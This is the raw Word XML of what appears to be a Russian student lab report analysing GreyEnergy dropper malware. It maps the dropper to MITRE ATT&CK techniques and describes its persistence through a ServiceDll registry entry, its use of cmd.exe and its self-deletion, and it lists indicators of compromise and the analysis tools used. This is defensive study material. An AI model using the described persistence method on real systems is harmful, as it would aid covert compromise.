                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Windows Service)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48633724" w14:textId="1397A0A7" w:rsidR="00893B9A" w:rsidRPr="00893B9A" w:rsidRDefault="00777471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893B9A" w:rsidRPr="00893B9A">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>T1059.003 (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Execution - </w:t>
            </w:r>
            <w:r w:rsidR="00893B9A" w:rsidRPr="00893B9A">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Windows Command Shell)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2147393F" w14:textId="6DF8871A" w:rsidR="00893B9A" w:rsidRPr="00893B9A" w:rsidRDefault="00893B9A" w:rsidP="00893B9A">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00893B9A">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>- T1112 (</w:t>
            </w:r>
            <w:r w:rsidR="00777471">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Defence Evasion - </w:t>
            </w:r>
            <w:r w:rsidRPr="00893B9A">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Modify Registry)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="446BDF35" w14:textId="3426C780" w:rsidR="00893B9A" w:rsidRPr="00893B9A" w:rsidRDefault="00777471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893B9A" w:rsidRPr="00893B9A">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>T1497.001 (Virtualization/Sandbox Evasion: System Checks)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="795ECC5E" w14:textId="27E8189A" w:rsidR="00893B9A" w:rsidRPr="00893B9A" w:rsidRDefault="008E634E" w:rsidP="00893B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893B9A" w:rsidRPr="00893B9A">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>T1070.004 (</w:t>
            </w:r>
            <w:r w:rsidR="00777471">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Defence Evasion - </w:t>
            </w:r>
            <w:r w:rsidR="00893B9A" w:rsidRPr="00893B9A">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>File Deletion)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D3F018B" w14:textId="57335055" w:rsidR="00893B9A" w:rsidRPr="00345FEC" w:rsidRDefault="00893B9A" w:rsidP="00893B9A">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="752B1FCA" w14:textId="6B7D5AB1" w:rsidR="00893B9A" w:rsidRPr="00893B9A" w:rsidRDefault="00777471" w:rsidP="00777471">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">Упакован </w:t>
            </w:r>
            <w:r w:rsidRPr="00777471">
              <w:t xml:space="preserve">Safeguard v1.03. При запуске: распаковывается в память, </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">запускает </w:t>
            </w:r>
            <w:r w:rsidRPr="00777471">
              <w:t>cmd.exe с командами reg add, move, del. Устанавливает ServiceDll = crkxko.dll в HKLM\...\RemoteAccess. Использует WMI для проверки служб. Самоуничтожается.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1BDFA8E2" w14:textId="372B5BA8" w:rsidR="00777471" w:rsidRPr="00777471" w:rsidRDefault="00777471" w:rsidP="0077747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>
              <w:t>Файл</w:t>
            </w:r>
            <w:r w:rsidRPr="00777471">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>: C:\Windows\System32\crkxko.dll</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3ED4C454" w14:textId="6F841CEB" w:rsidR="00777471" w:rsidRPr="00777471" w:rsidRDefault="00777471" w:rsidP="0077747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>
              <w:t>Путь</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>: %TEMP%\RCXE893.tmp, DBC0.tmp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="126F7E66" w14:textId="513642DD" w:rsidR="00893B9A" w:rsidRPr="00777471" w:rsidRDefault="00777471" w:rsidP="0077747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  <w:r>
              <w:t>Реестр</w:t>
            </w:r>
            <w:r w:rsidRPr="00777471">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>: HKLM\SYSTEM\CurrentControlSet\Services\RemoteAccess\Parameters\ServiceDll</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="63BC6A04" w14:textId="25A8F111" w:rsidR="00777471" w:rsidRDefault="00962492" w:rsidP="0077747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IDAPro,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A50C5D3" w14:textId="4E3C0EC4" w:rsidR="00893B9A" w:rsidRPr="00777471" w:rsidRDefault="00777471" w:rsidP="0077747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Process Monitor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1765" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67C22763" w14:textId="4751D5AD" w:rsidR="00893B9A" w:rsidRPr="00777471" w:rsidRDefault="00345FEC" w:rsidP="00777471">
            <w:pPr>
              <w:keepNext/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId45" w:history="1">
              <w:r w:rsidR="00777471" w:rsidRPr="00B045B5">
                <w:rPr>
                  <w:rStyle w:val="aff3"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>https://hybrid-analysis.com/sample/6c52a5850a57bea43a0a52ff0e2d2179653b97ae5406e884aee63e1cf340f58b/6556888e15e3439b0c04afd2</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00777471" w:rsidRPr="00777471">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0DE1BC34" w14:textId="09A52FB3" w:rsidR="00B249CD" w:rsidRPr="00777471" w:rsidRDefault="00777471" w:rsidP="00777471">
      <w:pPr>
        <w:pStyle w:val="aff0"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00777471">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Таблица </w:t>
      </w:r>
      <w:r w:rsidRPr="00777471">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00777471">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Таблица \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00777471">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00777471">
        <w:rPr>
          <w:b w:val="0"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00777471">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00777471">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. Описание исследуемых файлов</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7328E5B9" w14:textId="77777777" w:rsidR="00B249CD" w:rsidRPr="00777471" w:rsidRDefault="00B249CD" w:rsidP="001822CB">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sectPr w:rsidR="00B249CD" w:rsidRPr="00777471" w:rsidSect="00B249CD">
          <w:pgSz w:w="16838" w:h="11906" w:orient="landscape"/>
          <w:pgMar w:top="567" w:right="1134" w:bottom="1701" w:left="1134" w:header="709" w:footer="709" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="381"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FE59C62" w14:textId="4AB9F5D1" w:rsidR="007E7F61" w:rsidRDefault="00777471" w:rsidP="00777471">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc214273121"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Вывод</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="5B181F0D" w14:textId="61A8FB92" w:rsidR="00777471" w:rsidRPr="008E634E" w:rsidRDefault="00777471" w:rsidP="00777471">
      <w:r>
        <w:t xml:space="preserve">В </w:t>
      </w:r>
      <w:r w:rsidR="003B038F">
        <w:t>ходе лабораторной работы были изучены сценарии известной</w:t>
      </w:r>
      <w:r w:rsidRPr="00777471">
        <w:t xml:space="preserve"> целенаправленн</w:t>
      </w:r>
      <w:r w:rsidR="003B038F">
        <w:t xml:space="preserve">ой атаки – </w:t>
      </w:r>
      <w:r w:rsidR="003B038F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GreyEnergy</w:t>
      </w:r>
      <w:r w:rsidR="003B038F" w:rsidRPr="003B038F">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="003B038F">
        <w:t>конкретно – файлы-дропперы). Было изучено</w:t>
      </w:r>
      <w:r w:rsidRPr="00777471">
        <w:t xml:space="preserve"> вредоносное программное обеспечение (ВПО), используемое в целенаправленных атаках.</w:t>
      </w:r>
      <w:r w:rsidR="003B038F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008E634E">
        <w:t xml:space="preserve">Изучена классификация тактик и техник атак по </w:t>
      </w:r>
      <w:r w:rsidR="008E634E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MITRE</w:t>
      </w:r>
      <w:r w:rsidR="008E634E" w:rsidRPr="008E634E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008E634E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ATT</w:t>
      </w:r>
      <w:r w:rsidR="008E634E" w:rsidRPr="008E634E">
        <w:t>&amp;</w:t>
      </w:r>
      <w:r w:rsidR="008E634E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CK</w:t>
      </w:r>
      <w:r w:rsidR="008E634E" w:rsidRPr="008E634E">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="003B038F">
        <w:t xml:space="preserve">Получены навыки работы с такими утилитами как </w:t>
      </w:r>
      <w:r w:rsidR="003B038F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ProcessHacker</w:t>
      </w:r>
      <w:r w:rsidR="003B038F">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="003B038F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Process</w:t>
      </w:r>
      <w:r w:rsidR="003B038F" w:rsidRPr="003B038F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003B038F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Monitor</w:t>
      </w:r>
      <w:r w:rsidR="003B038F">
        <w:t>, виртуальные песочницы.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00777471" w:rsidRPr="008E634E" w:rsidSect="00B87E49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220844" w14:textId="77777777" w:rsidR="00A564BC" w:rsidRPr="00D60F71" w:rsidRDefault="00A564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AED6392" w14:textId="77777777" w:rsidR="00A564BC" w:rsidRPr="00D60F71" w:rsidRDefault="00A564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0ED2B8B6" w:rsidR="00F84DEF" w:rsidRPr="00C53ADA" w:rsidRDefault="00F84DEF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F23163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C1FCD" w14:textId="77777777" w:rsidR="00A564BC" w:rsidRPr="00D60F71" w:rsidRDefault="00A564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6794592" w14:textId="77777777" w:rsidR="00A564BC" w:rsidRPr="00D60F71" w:rsidRDefault="00A564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-284"/>
        </w:tabs>
        <w:ind w:left="-284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A36738"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="39A0263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2D727C7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="79063D96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2EA7BE9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EAD46E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903F0F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A1CEE7B4"/>
    <w:lvl w:ilvl="0" w:tplc="04190017">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:pStyle w:val="20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8B068A2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B574C918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A4FC0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="95AA3A72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16BD11DF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="89646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8E4AE3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0F3EFACC"/>
    <w:lvl w:ilvl="0" w:tplc="64FA673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1AE46589"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="14B84CC8"/>
    <w:lvl w:ilvl="0" w:tplc="1DB65302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7E58A8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AD4E2A46"/>
    <w:lvl w:ilvl="0" w:tplc="CFAECEA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20D95E52"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8444BE3E"/>
    <w:lvl w:ilvl="0" w:tplc="09C4290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1D34C5B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E7625878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7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="223F79F4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CF50B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4593673"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="433487A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0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27907370"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="ADDC5A4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2F1038AA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="07D86A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6EE134D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2FF6431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73A7D97"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C48A7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F457EA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0D085BEA"/>
    <w:lvl w:ilvl="0" w:tplc="CC36E7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3D64532C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1DD28B6C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7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="3EFA4D4F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3A648E5E"/>
    <w:lvl w:ilvl="0" w:tplc="F67A6C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D8073F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="61E05EF2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0" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5A3612EB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8A601532"/>
    <w:lvl w:ilvl="0" w:tplc="8208F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ACB6B09"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C87A7364"/>
    <w:lvl w:ilvl="0" w:tplc="2CE0D6B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5BAF13C9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="813C73F2"/>
    <w:lvl w:ilvl="0" w:tplc="77F6BD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6E65010"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9E022F3C"/>
    <w:lvl w:ilvl="0" w:tplc="3E00D34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7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="69BD3518"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E4A2BCDC"/>
    <w:lvl w:ilvl="0" w:tplc="ACEC8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3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626965"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="21BC92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39"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="36"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="38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3"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="26">
    <w:abstractNumId w:val="37"/>
  </w:num>
  <w:num w:numId="27">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="28">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="29">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="30">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="31">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="32">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="33">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="34">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="35">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="36">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="37">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="38">
    <w:abstractNumId w:val="40"/>
  </w:num>
  <w:num w:numId="39">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="40">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="41">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="42">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="43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4C49"/>
    <w:rsid w:val="00020E11"/>
    <w:rsid w:val="00023C3A"/>
    <w:rsid w:val="00027C43"/>
    <w:rsid w:val="00035C4C"/>
    <w:rsid w:val="0003656F"/>
    <w:rsid w:val="000455F2"/>
    <w:rsid w:val="0005524A"/>
    <w:rsid w:val="00055639"/>
    <w:rsid w:val="00060493"/>
    <w:rsid w:val="0006172D"/>
    <w:rsid w:val="00063498"/>
    <w:rsid w:val="00063A15"/>
    <w:rsid w:val="0008231D"/>
    <w:rsid w:val="00087FD7"/>
    <w:rsid w:val="00090579"/>
    <w:rsid w:val="00095910"/>
    <w:rsid w:val="00095EB5"/>
    <w:rsid w:val="000A5AC0"/>
    <w:rsid w:val="000A77C7"/>
    <w:rsid w:val="000B1F41"/>
    <w:rsid w:val="000B5D9C"/>
    <w:rsid w:val="000C3128"/>
    <w:rsid w:val="000D3339"/>
    <w:rsid w:val="000D5DB8"/>
    <w:rsid w:val="000E3FC9"/>
    <w:rsid w:val="000F4313"/>
    <w:rsid w:val="000F6783"/>
    <w:rsid w:val="000F71FD"/>
    <w:rsid w:val="001000B6"/>
    <w:rsid w:val="0010041E"/>
    <w:rsid w:val="00100757"/>
    <w:rsid w:val="00102252"/>
    <w:rsid w:val="00115699"/>
    <w:rsid w:val="0014248B"/>
    <w:rsid w:val="00142EE0"/>
    <w:rsid w:val="00144AAF"/>
    <w:rsid w:val="00151BEC"/>
    <w:rsid w:val="00155135"/>
    <w:rsid w:val="00162375"/>
    <w:rsid w:val="001662B1"/>
    <w:rsid w:val="0017290F"/>
    <w:rsid w:val="00174C68"/>
    <w:rsid w:val="001822CB"/>
    <w:rsid w:val="001832F5"/>
    <w:rsid w:val="001A29E5"/>
    <w:rsid w:val="001B1B03"/>
    <w:rsid w:val="001B32F7"/>
    <w:rsid w:val="001C659F"/>
    <w:rsid w:val="001D1977"/>
    <w:rsid w:val="001D1AD1"/>
    <w:rsid w:val="001E0155"/>
    <w:rsid w:val="001E35E2"/>
    <w:rsid w:val="001E6E38"/>
    <w:rsid w:val="001F2531"/>
    <w:rsid w:val="0020070E"/>
    <w:rsid w:val="002014EC"/>
    <w:rsid w:val="00210D66"/>
    <w:rsid w:val="0021780B"/>
    <w:rsid w:val="00233D60"/>
    <w:rsid w:val="00235E5C"/>
    <w:rsid w:val="002378B3"/>
    <w:rsid w:val="00241F37"/>
    <w:rsid w:val="002466AB"/>
    <w:rsid w:val="002523D2"/>
    <w:rsid w:val="0025334A"/>
    <w:rsid w:val="00260B4F"/>
    <w:rsid w:val="00266668"/>
    <w:rsid w:val="002862A4"/>
    <w:rsid w:val="0029543C"/>
    <w:rsid w:val="002A1C0F"/>
    <w:rsid w:val="002A3261"/>
    <w:rsid w:val="002B236E"/>
    <w:rsid w:val="002B4714"/>
    <w:rsid w:val="002D1672"/>
    <w:rsid w:val="002D2224"/>
    <w:rsid w:val="002D5007"/>
    <w:rsid w:val="002D5C58"/>
    <w:rsid w:val="002E373A"/>
    <w:rsid w:val="002F651D"/>
    <w:rsid w:val="002F66B9"/>
    <w:rsid w:val="00303780"/>
    <w:rsid w:val="00305BF8"/>
    <w:rsid w:val="00306306"/>
    <w:rsid w:val="00312B77"/>
    <w:rsid w:val="00321776"/>
    <w:rsid w:val="00322FF4"/>
    <w:rsid w:val="00327A23"/>
    <w:rsid w:val="00341A02"/>
    <w:rsid w:val="00344512"/>
    <w:rsid w:val="00345FEC"/>
    <w:rsid w:val="0035075D"/>
    <w:rsid w:val="00350A06"/>
    <w:rsid w:val="00364BF2"/>
    <w:rsid w:val="00371E39"/>
    <w:rsid w:val="0037417C"/>
    <w:rsid w:val="00384E68"/>
    <w:rsid w:val="00384ECC"/>
    <w:rsid w:val="00395E78"/>
    <w:rsid w:val="003A2D0A"/>
    <w:rsid w:val="003A2DAF"/>
    <w:rsid w:val="003B038F"/>
    <w:rsid w:val="003B2153"/>
    <w:rsid w:val="003B7418"/>
    <w:rsid w:val="003C03F8"/>
    <w:rsid w:val="003C218B"/>
    <w:rsid w:val="003D414E"/>
    <w:rsid w:val="003D7B70"/>
    <w:rsid w:val="003E4132"/>
    <w:rsid w:val="003E4C7B"/>
    <w:rsid w:val="003E6ADD"/>
    <w:rsid w:val="003F38DE"/>
    <w:rsid w:val="004045D1"/>
    <w:rsid w:val="0040671E"/>
    <w:rsid w:val="004156CB"/>
    <w:rsid w:val="004329C7"/>
    <w:rsid w:val="004572E6"/>
    <w:rsid w:val="00462470"/>
    <w:rsid w:val="00463870"/>
    <w:rsid w:val="00467900"/>
    <w:rsid w:val="0047238C"/>
    <w:rsid w:val="00475C3D"/>
    <w:rsid w:val="004838AE"/>
    <w:rsid w:val="00497F6F"/>
    <w:rsid w:val="004A0930"/>
    <w:rsid w:val="004A3DA9"/>
    <w:rsid w:val="004A635B"/>
    <w:rsid w:val="004B37E8"/>
    <w:rsid w:val="004B5CD2"/>
    <w:rsid w:val="004C0774"/>
    <w:rsid w:val="004C496A"/>
    <w:rsid w:val="004C4F38"/>
    <w:rsid w:val="004C7F0A"/>
    <w:rsid w:val="004D1F37"/>
    <w:rsid w:val="004E4318"/>
    <w:rsid w:val="004E43F6"/>
    <w:rsid w:val="004E5D3A"/>
    <w:rsid w:val="004F2A89"/>
    <w:rsid w:val="004F3DE8"/>
    <w:rsid w:val="004F3F56"/>
    <w:rsid w:val="004F69EC"/>
    <w:rsid w:val="004F7F88"/>
    <w:rsid w:val="00501D3F"/>
    <w:rsid w:val="00503758"/>
    <w:rsid w:val="00506EA5"/>
    <w:rsid w:val="005100F0"/>
    <w:rsid w:val="00510921"/>
    <w:rsid w:val="0051244E"/>
    <w:rsid w:val="00516DFF"/>
    <w:rsid w:val="00542BBC"/>
    <w:rsid w:val="00543F39"/>
    <w:rsid w:val="00544F2D"/>
    <w:rsid w:val="00560DEE"/>
    <w:rsid w:val="00561F7F"/>
    <w:rsid w:val="00577D93"/>
    <w:rsid w:val="005A1277"/>
    <w:rsid w:val="005B7B90"/>
    <w:rsid w:val="005C7A1F"/>
    <w:rsid w:val="005D2800"/>
    <w:rsid w:val="005D6BC1"/>
    <w:rsid w:val="005D7E44"/>
    <w:rsid w:val="005E2F45"/>
    <w:rsid w:val="005E41A0"/>
    <w:rsid w:val="005E4F2A"/>
    <w:rsid w:val="005F2C76"/>
    <w:rsid w:val="005F78C9"/>
    <w:rsid w:val="00601F8B"/>
    <w:rsid w:val="0060258B"/>
    <w:rsid w:val="006053F5"/>
    <w:rsid w:val="006058F1"/>
    <w:rsid w:val="0061144C"/>
    <w:rsid w:val="006125CA"/>
    <w:rsid w:val="00613AA4"/>
    <w:rsid w:val="00616951"/>
    <w:rsid w:val="00617066"/>
    <w:rsid w:val="00641577"/>
    <w:rsid w:val="00643131"/>
    <w:rsid w:val="00652A77"/>
    <w:rsid w:val="00674524"/>
    <w:rsid w:val="006832D3"/>
    <w:rsid w:val="006959C1"/>
    <w:rsid w:val="006974E8"/>
    <w:rsid w:val="006A179F"/>
    <w:rsid w:val="006A319E"/>
    <w:rsid w:val="006A3840"/>
    <w:rsid w:val="006B34A4"/>
    <w:rsid w:val="006B3E75"/>
    <w:rsid w:val="006B4CA3"/>
    <w:rsid w:val="006C5C34"/>
    <w:rsid w:val="006C7A54"/>
    <w:rsid w:val="006E598D"/>
    <w:rsid w:val="006E7B40"/>
    <w:rsid w:val="006F5F48"/>
    <w:rsid w:val="00704A66"/>
    <w:rsid w:val="0070592F"/>
    <w:rsid w:val="0071183B"/>
    <w:rsid w:val="00712D12"/>
    <w:rsid w:val="007246FB"/>
    <w:rsid w:val="00724CAF"/>
    <w:rsid w:val="00734F49"/>
    <w:rsid w:val="007507C7"/>
    <w:rsid w:val="0075210F"/>
    <w:rsid w:val="00754A40"/>
    <w:rsid w:val="00761928"/>
    <w:rsid w:val="00773594"/>
    <w:rsid w:val="00777471"/>
    <w:rsid w:val="0078465D"/>
    <w:rsid w:val="00792FE6"/>
    <w:rsid w:val="00793619"/>
    <w:rsid w:val="00795A8A"/>
    <w:rsid w:val="007A4426"/>
    <w:rsid w:val="007A4852"/>
    <w:rsid w:val="007A7E1C"/>
    <w:rsid w:val="007B2865"/>
    <w:rsid w:val="007C32A9"/>
    <w:rsid w:val="007C378E"/>
    <w:rsid w:val="007C395F"/>
    <w:rsid w:val="007C5F20"/>
    <w:rsid w:val="007D0609"/>
    <w:rsid w:val="007D3A85"/>
    <w:rsid w:val="007E7F61"/>
    <w:rsid w:val="007F73D4"/>
    <w:rsid w:val="008045D8"/>
    <w:rsid w:val="00805223"/>
    <w:rsid w:val="00812A5B"/>
    <w:rsid w:val="0081360D"/>
    <w:rsid w:val="00816055"/>
    <w:rsid w:val="008229D3"/>
    <w:rsid w:val="008244CC"/>
    <w:rsid w:val="00827324"/>
    <w:rsid w:val="008302C7"/>
    <w:rsid w:val="00830F2D"/>
    <w:rsid w:val="008323C2"/>
